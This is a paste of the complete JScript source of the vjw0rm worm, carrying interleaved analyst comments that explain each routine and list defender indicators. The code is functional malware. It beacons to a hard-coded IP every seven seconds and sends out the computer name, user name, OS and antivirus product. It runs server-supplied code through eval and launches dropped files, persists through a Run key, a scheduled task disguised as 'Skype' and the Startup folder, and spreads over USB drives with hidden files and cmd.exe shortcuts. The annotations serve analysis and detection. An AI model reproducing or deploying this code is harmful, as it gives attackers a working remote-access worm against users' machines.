
Untitled

a guest
Jan 16th, 2017
  1. // Coded by v_B01 | Sliemerez -> Twitter : Sliemerez
  2.  
  // Analyst note: the three arrays below are string tables that the rest of the script indexes into.
  // j: COM ProgIDs instantiated by Cr() (shell, file system, Shell.Application, XMLHTTP).
  3. var j = ["WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];
  // g: registry fragments. g[2] is the marker value HKCU\vjw0rm, g[3] the Run key path,
  // g[4] and g[6] the class / DefaultIcon paths read in Spr(), g[5] the REG_SZ value type.
  4. var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
  // y: WMI moniker (y[0]) and the WMI class names queried by Ob() and Spr().
  5. var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];
  6.  
  // sh = WScript.Shell (j[0]), fs = Scripting.FileSystemObject (j[1]).
  7. var sh = Cr(0);
  8. var fs = Cr(1);
  // spl separates the fields of a server response; Ch is a backslash used as path and field separator.
  9. var spl = "|V|";
  10. var Ch = "\\";
  // VN is "mdz_" followed by the value of Ob(6) (a logical-disk volume serial number);
  // it is the first field of the host string built in nf().
  11. var VN = "mdz" + "_" + Ob(6);
  // fu = full path of the running script, wn = its file name.
  12. var fu = WScript.ScriptFullName;
  13. var wn = WScript.ScriptName;
  // U caches the marker stored in HKCU\vjw0rm. When the value does not exist RegRead throws,
  // and the catch branch creates it: "TRUE" if the second path component of the script path
  // equals the script name (the script sits directly in a drive root), otherwise "FALSE".
  // NOTE(review): presumably this records whether the first run came from a drive root; confirm.
  // Defender note: the HKCU\vjw0rm value is a host indicator left on every machine that ran this.
  14. var U;
  15. try {
  16. U = sh.RegRead(g[2]);
  17. } catch(err) {
  18. var sv = fu.split("\\");
  19. if (":\\" + sv[1] == ":\\" + wn) {
  20. U = "TRUE";
  21. sh.RegWrite(g[2],U,g[5]);
  22. } else {
  23. U = "FALSE";
  24. sh.RegWrite(g[2],U,g[5]);
  25. }
  26. }
  // Ns() (defined further down) copies the script and registers the autostart entries.
  27. Ns();
  // Main loop: every iteration POSTs to the "Vre" path via Pt(), splits the response on "|V|"
  // and dispatches on the first field. Nothing in the loop authenticates the response, so
  // whoever answers on that endpoint controls the host.
  28. do {
  29. try {
  30. var P = Pt('Vre','');
  31. P = P.split(spl);
  32.  
  // "Cl": terminate the script.
  33. if (P[0] === "Cl") {
  34. WScript.Quit(1);
  35. }
  36.  
  // "Sc": write P[1] to %temp%\<P[2]> and launch that file through the shell.
  37. if (P[0] === "Sc") {
  38. var s2 = Ex("temp") + "\\" + P[2];
  39. var fi = fs.CreateTextFile(s2,true);
  40. fi.Write(P[1]);
  41. fi.Close();
  42. sh.run(s2);
  43. }
  44.  
  // "Ex": evaluate P[1] as script code inside this process (eval on server-supplied data).
  45. if (P[0] === "Ex") {
  46. eval(P[1]);
  47. }
  48.  
  // "Rn": read the script's own file, replace the first occurrence of the VN prefix
  // (the part before "_") with P[1], write it back, relaunch under wscript //B and exit.
  49. if (P[0] === "Rn") {
  50. var ri = fs.OpenTextFile(fu,1);
  51. var fr = ri.ReadAll();
  52. ri.Close();
  53. VN = VN.split("_");
  54. fr = fr.replace(VN[0],P[1]);
  55. var wi = fs.OpenTextFile(fu,2,false);
  56. wi.Write(fr);
  57. wi.Close();
  58. sh.run("wscript.exe //B \"" + fu + "\"");
  59. WScript.Quit(1);
  60. }
  61.  
  // "Up": write P[1] (first "|U|" rewritten to "|V|") to %temp%\<P[2]>, start it with
  // wscript //B using window style 6, then exit this instance.
  62. if (P[0] === "Up") {
  63. var s2 = Ex("temp") + "\\" + P[2];
  64. var ctf = fs.CreateTextFile(s2,true);
  65. var gu = P[1];
  66. gu = gu.replace("|U|","|V|");
  67. ctf.Write(gu);
  68. ctf.Close();
  69. sh.run("wscript.exe //B \"" + s2 + "\"",6);
  70. WScript.Quit(1);
  71. }
  72.  
  // "Un": substitute %f, %n, %sfdr and %RgNe% in P[1] with the script path, script name,
  // a %Temp% path and the Run value name, eval the result, then exit.
  // NOTE(review): presumably the operator's uninstall routine; the code itself comes from the server.
  73. if (P[0] === "Un") {
  74. var s2 = P[1];
  75. var vdr = Ex("Temp") + Ch + wn;
  76. var regi = "LULG0YFRS5";
  77. s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);
  78. eval(s2);
  79. WScript.Quit(1);
  80. }
  81.  
  // "RF": same steps as "Sc" (drop P[1] into %temp%\<P[2]> and launch it).
  82. if (P[0] === "RF") {
  83. var s2 = Ex("temp") + "\\" + P[2];
  84. var fi = fs.CreateTextFile(s2,true);
  85. fi.Write(P[1]);
  86. fi.Close();
  87. sh.run(s2);
  88. }
  // Every error (network failure, malformed response, failed write) is swallowed here,
  // so the loop never stops on its own.
  89. } catch(err) {
  90. }
  // Fixed 7000 ms pause, then Spr() runs before the next request. Defender note: this yields
  // a regular HTTP POST roughly every seven seconds from wscript.exe.
  91. WScript.Sleep(7000);
  92. Spr();
  93. } while (true) ;
  94.  
  95.  
  // Ex(S): returns the expanded value of environment variable S by wrapping the name in
  // percent signs and passing it to WScript.Shell.ExpandEnvironmentStrings.
  96. function Ex(S) {
  97. return sh.ExpandEnvironmentStrings("%" + S + "%");
  98. }
  // Pt(C, A): sends a synchronous HTTP POST (third open() argument is false) with body A to
  // path C on the hard-coded address below and returns the response text.
  // The header named "User-Agent:" (colon included, as written) carries the host string from
  // nf(). Defender note: traffic is plain HTTP, and a User-Agent value made of
  // backslash-separated host details is a usable network signature.
  99. function Pt(C,A) {
  100. var X = Cr(3);
  101. X.open('POST','http://41.102.196.226:1998/' + C, false);
  102. X.SetRequestHeader("User-Agent:",nf());
  103. X.send(A);
  104. return X.responsetext;
  105. }
  106.  
  107.  
  // nf(): builds the host string sent with every request.
  // NT is "YES" when vbc.exe exists under %Windir%\Microsoft.NET\Framework\v2.0.50727, else "NO".
  // Fields, backslash-separated: VN, COMPUTERNAME, USERNAME, Ob(2) (OS caption),
  // Ob(4) (antivirus display name), an empty field, NT, and the U marker.
  // i is declared but never used.
  108. function nf() {
  109. var s,NT,i;
  110. if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {
  111. NT ="YES";
  112. } else {
  113. NT = "NO";
  114. }
  115. s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
  116. return s;
  117. }
  118.  
  // Cr(N): instantiates the COM object whose ProgID is stored at index N of the j table.
  119. function Cr(N) {
  120. return new ActiveXObject(j[N]);
  121. }
  122.  
  // Ob(N): WMI lookups selected by N. Any other N falls through and returns undefined.
  //   N == 2: Caption of the first Win32_OperatingSystem instance.
  //   N == 4: DisplayName of an AntiVirusProduct instance (see below).
  //   N == 6: volumeserialnumber of the first win32_logicaldisk instance.
  // The break statements after return are unreachable.
  123. function Ob(N) {
  124. var s;
  125. if (N == 2) {
  126. s = GetObject(y[0]).InstancesOf(y[2]);
  127. var en = new Enumerator(s);
  128. for (; !en.atEnd();en.moveNext()) {
  129. var it = en.item();
  130. return it.Caption;
  131. break;
  132. }
  133. }
  134. if (N == 4) {
  // First pass queries root\securitycenter and keeps the last DisplayName seen in str.
  135. var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
  136. s = GetObject(wmg).InstancesOf(y[3]);
  137. var en = new Enumerator(s);
  138. for (; !en.atEnd();en.moveNext()) {
  139. var it = en.item();
  140. var str = it.DisplayName;
  141. }
  // str is undefined when the first namespace returned no instances, and undefined !== ''
  // is true, so that case also takes this branch and queries root\securitycenter2.
  // The else branch is reached only when str is the empty string.
  142. if (str !== '') {
  143. wmg = wmg + "2";
  144. s = GetObject(wmg).InstancesOf(y[3]);
  145. en = new Enumerator(s);
  146. for (; !en.atEnd();en.moveNext()) {
  147. it = en.item();
  148. return it.DisplayName;
  149. }
  150. } else {
  151. return it.DisplayName;
  152. }
  153. }
  154. if (N==6) {
  155. s = GetObject(y[0]).InstancesOf(y[1]);
  156. var en = new Enumerator(s);
  157. for (; !en.atEnd();en.moveNext()) {
  158. var it = en.item();
  159. return it.volumeserialnumber;
  160. break;
  161. }
  162. }
  163. }
  164.  
  // Ns(): persistence routine; each step sits in its own try block with an empty catch, so a
  // failed step is skipped silently. Defender note: remediation has to cover all four
  // artefacts below, because any one of them restarts the script.
  165. function Ns() {
  // 1. Copy of the script at %UserProfile%\<script name>.
  166. var dr = Ex("UserProfile") + Ch + wn;
  167. try {
  168. fs.CopyFile(fu,dr,true);
  169. } catch(err) {
  170. }
  // 2. Value "LULG0YFRS5" under HKCU\Software\Microsoft\Windows\CurrentVersion\Run holding
  //    the quoted path of that copy.
  171. try {
  172. sh.RegWrite(g[0] + g[3] + "LULG0YFRS5","\"" + dr + "\"",g[5]);
  173. } catch(err) {
  174. }
  // 3. Scheduled task named "Skype", set to run every 30 minutes with the copy as its action.
  //    The /tr argument has an opening quote and no closing quote, as written.
  175. try {
  176. sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr,false);
  177. } catch(err) {
  178. }
  179.  
  // 4. Second copy in the folder returned by Shell.Application NameSpace(7); shell special
  //    folder constant 7 is the per-user Startup folder.
  180. try {
  181. var ap = Cr(2);
  182. fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn,true);
  183. } catch(err) {
  184. }
  185. }
  186.  
  187.  
  // Spr(): called after every polling cycle; handles removable media.
  // For each win32_logicaldisk instance that FileSystemObject reports as ready with
  // DriveType 1 (removable), it copies the script to the drive root and marks the copy with
  // attributes 2+4 (hidden + system). Root-level folders and files are then hidden the same
  // way and replaced by .lnk shortcuts that point at cmd.exe.
  // Defender note: the artefacts on an affected drive are .lnk files whose target is cmd.exe
  // with "/c start ... &start ... &exit" arguments, next to hidden+system originals and a
  // hidden script in the root. The originals are only hidden, not deleted.
  188. function Spr() {
  189. try {
  190. var ld = GetObject(y[0]).InstancesOf(y[1]);
  191. var edi = new Enumerator(ld);
  192. for (;!edi.atEnd();edi.moveNext())
  193. {
  194. var dri = edi.item();
  // dri is redeclared: from here on it is the FileSystemObject Drive for the same DeviceID.
  195. var dri = fs.GetDrive(dri.DeviceID);
  196. var dp = dri.Path + "\\";
  197. if (dri.IsReady) {
  198. if (dri.DriveType === 1) {
  199. fs.CopyFile(fu,dp + wn,true);
  200. if (fs.FileExists(dp + wn)) {
  201. fs.GetFile(dp + wn).attributes=2+4;
  202. }
  // Subfolders of the drive root: hide each one and write "<folder name>.lnk" beside it.
  203. try {
  204. var ef = new Enumerator(fs.GetFolder(dp).SubFolders);
  205. for (;!ef.atEnd();ef.moveNext()) {
  206. var gf = ef.item();
  207. gf.attributes=2+4;
  // Only the first space is replaced, and wn is the script-wide variable, so this
  // rewrite persists across iterations and later calls.
  208. wn = wn.replace(" ", "\"" + " " + "\"");
  209. var n = gf.name;
  210. n = n.replace(" ", "\"" + " " + "\"");
  211. var sr = sh.CreateShortCut(dp + gf.name + ".lnk");
  // WindowStyle 7 opens the shortcut target minimized.
  212. sr.WindowStyle = 7;
  213. sr.TargetPath = "cmd.exe";
  214. sr.Arguments = "/c start " + wn + "&start explorer " + n + "&exit";
  // The icon is taken from the registry default icon for folders when the shortcut's
  // current IconLocation contains a comma, otherwise it is set to the folder path.
  215. var rp = "HKLM\\software\\classes\\folder\\defaulticon\\";
  216. var fic = sh.RegRead(rp);
  217. var ci = sr.IconLocation;
  218. var sci = ",";
  219. if (ci.indexOf(sci) !== -1) {
  220. sr.IconLocation = fic;
  221. } else {
  222. sr.IconLocation = gf.Path;
  223. }
  224. sr.Save();
  225. }
  226.  
  227. } catch(err) {}
  // Files in the drive root: skip names without a ".", names containing "lnk", and the
  // script itself; hide every other file and write "<file name>.lnk" beside it.
  228. try {
  229. var efi = new Enumerator(fs.GetFolder(dp).Files);
  230. for (;!efi.atEnd();efi.moveNext()) {
  231. var gfi = efi.item();
  232. var dot = ".";
  233. var lnk = "lnk";
  234. if (gfi.name.indexOf(dot) !== -1) {
  235. if (gfi.name.indexOf(lnk) !== -1) {
  236. } else {
  237. if (gfi.name !== wn) {
  238. gfi.attributes=2+4;
  239. var nu = gfi.name;
  240. nu = nu.replace(" ", "\"" + " " + "\"");
  241. wn = wn.replace(" ", "\"" + " " + "\"");
  242. var shr = sh.CreateShortCut(dp + gfi.name + ".lnk");
  243. shr.WindowStyle=7;
  244. shr.TargetPath = "cmd.exe";
  245. shr.Arguments = "/c start " + wn + "&start " + nu + "&exit";
  // Icon lookup: the default value of HKLM\SOFTWARE\Classes\.<ext>\ is read into fvi,
  // then the default value under HKLM\SOFTWARE\Classes\<fvi>\defaulticon\ into fvi2.
  246. var sgf = gfi.name.split(".");
  247. var fvi = sh.RegRead(g[4] + "." + sgf[sgf.length -1] + "\\");
  248. var fvi2 = sh.RegRead(g[4] + fvi + g[6] + "\\");
  249. var ci = shr.IconLocation;
  250. var sci = ",";
  251. if (ci.indexOf(sci) !== -1) {
  252. shr.IconLocation = fvi2;
  253. } else {
  254. shr.IconLocation = gfi.Path;
  255. }
  256. shr.Save();
  257. }
  258. }
  259. }
  260. }
  261. } catch(err) {}
  262. }
  263. }
  264. }
  265.  
  // Any error raised outside the inner try blocks ends this pass silently.
  266. } catch(err) {
  267.  
  268. }
  269. }